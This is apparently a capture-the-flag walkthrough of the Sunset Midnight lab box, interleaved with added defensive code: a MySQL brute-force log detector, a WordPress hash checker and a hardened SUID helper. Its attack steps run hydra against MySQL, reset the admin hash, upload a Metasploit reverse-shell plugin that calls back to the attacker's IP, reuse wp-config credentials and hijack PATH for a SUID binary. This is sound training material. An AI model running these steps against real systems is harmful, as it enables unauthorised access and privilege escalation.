PGP:SunsetMidnight


Scan

nmap

nmap 192.168.61.88 -p 22,80,3306 -sCV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-13 09:26 CST
Nmap scan report for 192.168.61.88
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 19
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, DontAllowDatabaseTableColumn, ODBCClient, LongColumnFlag, SupportsLoadDataLocal, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: Vuh-DM7l9vj1T3B0jGdB
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

80 port

Note: add sunset-midnight to /etc/hosts if you cannot open the website.

After viewing it you will find this is a WordPress site.

But when I ran wpscan to look for something, I got nothing.

wpscan --url http://sunset-midnight                               
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ /  / / |  ___/ ___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             /  /   |_|    |_____/ ___|__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

3306 port

So I turned to 3306, trying weak passwords with hydra and guessing root as the username.

hydra -s 3306 -l root -P /usr/share/wordlists/rockyou.txt -t 16 192.168.61.88 mysql

Surprisingly, I got the password root:robert. Now I can log into MySQL to change the WordPress administrator password.
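As an added detection-side example (not part of the original write-up): the hydra run above leaves one "Access denied" warning per attempt in the MariaDB error log (written when log_warnings is at its default of 2, which I assume here). This script counts failures per source inside a sliding window; the log lines are constructed to look like that run, using the attacker address from this post.

```python
# Added example (not part of the original post): spot a hydra-style
# password spray against MySQL/MariaDB from the server's error log.
# Line format approximates MariaDB 10.3 with log_warnings=2; the
# log lines below are constructed for this demo.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} {1,2}\d{1,2}:\d{2}:\d{2}) +\d+ \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']+)'"
)

SAMPLE_LOG = """\
2022-05-13 13:56:01 17 [Warning] Access denied for user 'root'@'192.168.49.117' (using password: YES)
2022-05-13 13:56:01 18 [Warning] Access denied for user 'root'@'192.168.49.117' (using password: YES)
2022-05-13 13:56:02 19 [Warning] Access denied for user 'root'@'192.168.49.117' (using password: YES)
2022-05-13 13:56:02 20 [Warning] Access denied for user 'root'@'192.168.49.117' (using password: YES)
2022-05-13 13:56:03 21 [Warning] Access denied for user 'root'@'192.168.49.117' (using password: YES)
2022-05-13 14:10:44 42 [Warning] Access denied for user 'jose'@'localhost' (using password: YES)
"""


def parse_failures(log_text):
    """Yield (timestamp, user, source) for every failed-login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # MariaDB pads single-digit hours with a space; normalise that
            ts = datetime.strptime(" ".join(m["ts"].split()), "%Y-%m-%d %H:%M:%S")
            yield ts, m["user"], m["src"]


def brute_force_sources(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source: total_failures} for every source that produced
    at least `threshold` failures inside some window of length `window`."""
    by_src = defaultdict(list)
    for ts, _user, src in parse_failures(log_text):
        by_src[src].append(ts)
    hits = {}
    for src, times in by_src.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                hits[src] = len(times)
                break
    return hits
```

A threshold this low only makes sense because a legitimate client rarely fails five times in a minute; the fix for the box is not to let root log in over the network at all.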

Shell as www

I logged into MySQL as root without any trouble.

There was only admin in the wp_users table. Although I got the password hash, I could not crack it.

So I changed the admin password to 123456. This site can be used to generate a hash the way WordPress does: www.useotools.com/wordpress-p… Or you can just use MD5.

UPDATE `wp_users` SET `user_pass` = '$P$BtmTpjEYj/n0MwVQ0VAhF5m6uTTEyd0' WHERE ID = 1
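An added example, not the post's or WordPress's own code: the WordPress password check re-implemented in Python, which shows why both a phpass "$P$" hash and a bare MD5 work in the UPDATE above. The is_legacy_md5 check doubles as an audit for wp_users rows that were written straight into the database instead of set through WordPress; the password and salt are my own test values.

```python
# Added example (not from the post): how WordPress verifies a stored
# user_pass, reimplemented from phpass, so wp_users rows can be audited.
# Password and salt values used with it are constructed for the demo.
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _encode64(data: bytes, count: int) -> str:  # phpass' base64 variant
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """md5(salt+pw), then 2**count_log2 rounds of md5(h+pw); 13 is the 'B'."""
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + _encode64(h, 16)

def is_legacy_md5(stored: str) -> bool:
    """Bare 32-hex MD5 is still accepted (and rehashed on next login)."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored)

def wp_check_password(password: str, stored: str) -> bool:
    """Mirror of WordPress wp_check_password(): MD5 path, then phpass."""
    if is_legacy_md5(stored):
        return hashlib.md5(password.encode()).hexdigest() == stored
    if len(stored) != 34 or not stored.startswith("$P$"):
        return False
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:  # phpass rejects other work factors
        return False
    return phpass_hash(password, stored[4:12], count_log2) == stored
```

A row whose user_pass is a bare MD5 (or whose hash changed without a matching password-reset event) is worth a closer look; WordPress itself never writes one.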

I logged into the panel with admin:123456. But when I tried to insert PHP reverse-shell code into a widget as usual, it showed me an error.

I googled for the reason but found nothing, so I had to look for another way.

Finally, I found a way around this in VulnHub Sunset Midnight Walkthrough (doyler.net). Thanks bro.

I used this malicious plugin. But be aware that this script uses MSF, so take care if you are doing the OSCP.

git clone https://github.com/wetw0rk/malicious-wordpress-plugin

python wordpwn.py 192.168.49.117 4444 Y

Then upload this plugin to WP, under Plugins --> Add New --> Upload.

After a successful upload, browse to

sunset-midnight/wp-content/plugins/malicious/wetw0rk_maybe.php

to get the reverse shell.

Note again: it uses MSF.

Shell as jose

After getting a shell on the WordPress service, the first thing is to look through wp-config.php.

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

Here you will find jose's password.

Then I logged in with it smoothly.

Privilege Escalation to root

I tried to find binaries with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

I found two interesting binaries. One is dmcrypt-get-device, with CVE-2017-6964. But it seems like a rabbit hole because there was no exploit for it.

Then I turned to status, a user-defined binary. It calls service as root.

So I created a file named service and wrote /bin/sh in it.

echo "/bin/sh" > service
export PATH=$PATH:/home/jose # add a directory I can write to into PATH
chmod +x service # make service executable
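An added C example, not the box's own status binary: the weak pattern (a SUID helper running `service` through system(), so the caller's PATH decides which binary is executed) next to a hardened version that resolves the name only inside a fixed list of trusted directories and execs it with a minimal environment. TRUSTED_DIRS and the function names are my own choices.

```c
/* Added example (not the box's own "status" binary): the weak pattern
 * that makes a SUID helper hijackable, next to a hardened lookup that
 * ignores the caller's PATH. Directory list and names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Weak: system() hands the command to /bin/sh, which resolves "service"
 * through the inherited PATH, so a writable PATH entry wins. */
int status_weak(void) {
    return system("service apache2 status");
}

/* Hardened lookup: only these directories are searched, in this order. */
static const char *const TRUSTED_DIRS[] = {"/bin", "/usr/bin", "/sbin", "/usr/sbin", NULL};

/* Resolve a bare program name against TRUSTED_DIRS, never against PATH.
 * Returns 0 and fills out[] with the absolute path, -1 otherwise. */
int safe_exec_path(const char *name, char *out, size_t outlen) {
    struct stat st;
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;                          /* bare names only, no "../" */
    for (const char *const *d = TRUSTED_DIRS; *d != NULL; d++) {
        int n = snprintf(out, outlen, "%s/%s", *d, name);
        if (n < 0 || (size_t)n >= outlen)
            return -1;                      /* would have been truncated */
        if (stat(out, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 0111))
            return 0;                       /* regular, executable file */
    }
    return -1;
}

/* Hardened: absolute path, a fixed minimal environment, and no shell in
 * between. On success execve() replaces the process; -1 means it failed. */
int status_hardened(void) {
    char path[4096];
    if (safe_exec_path("service", path, sizeof path) != 0)
        return -1;
    char *const argv[] = {path, "apache2", "status", NULL};
    char *const envp[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};
    return execve(path, argv, envp);
}
```

The same audit applies to any SUID binary on a box: if `strings` on it shows a bare command name, the caller's PATH is part of its attack surface.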
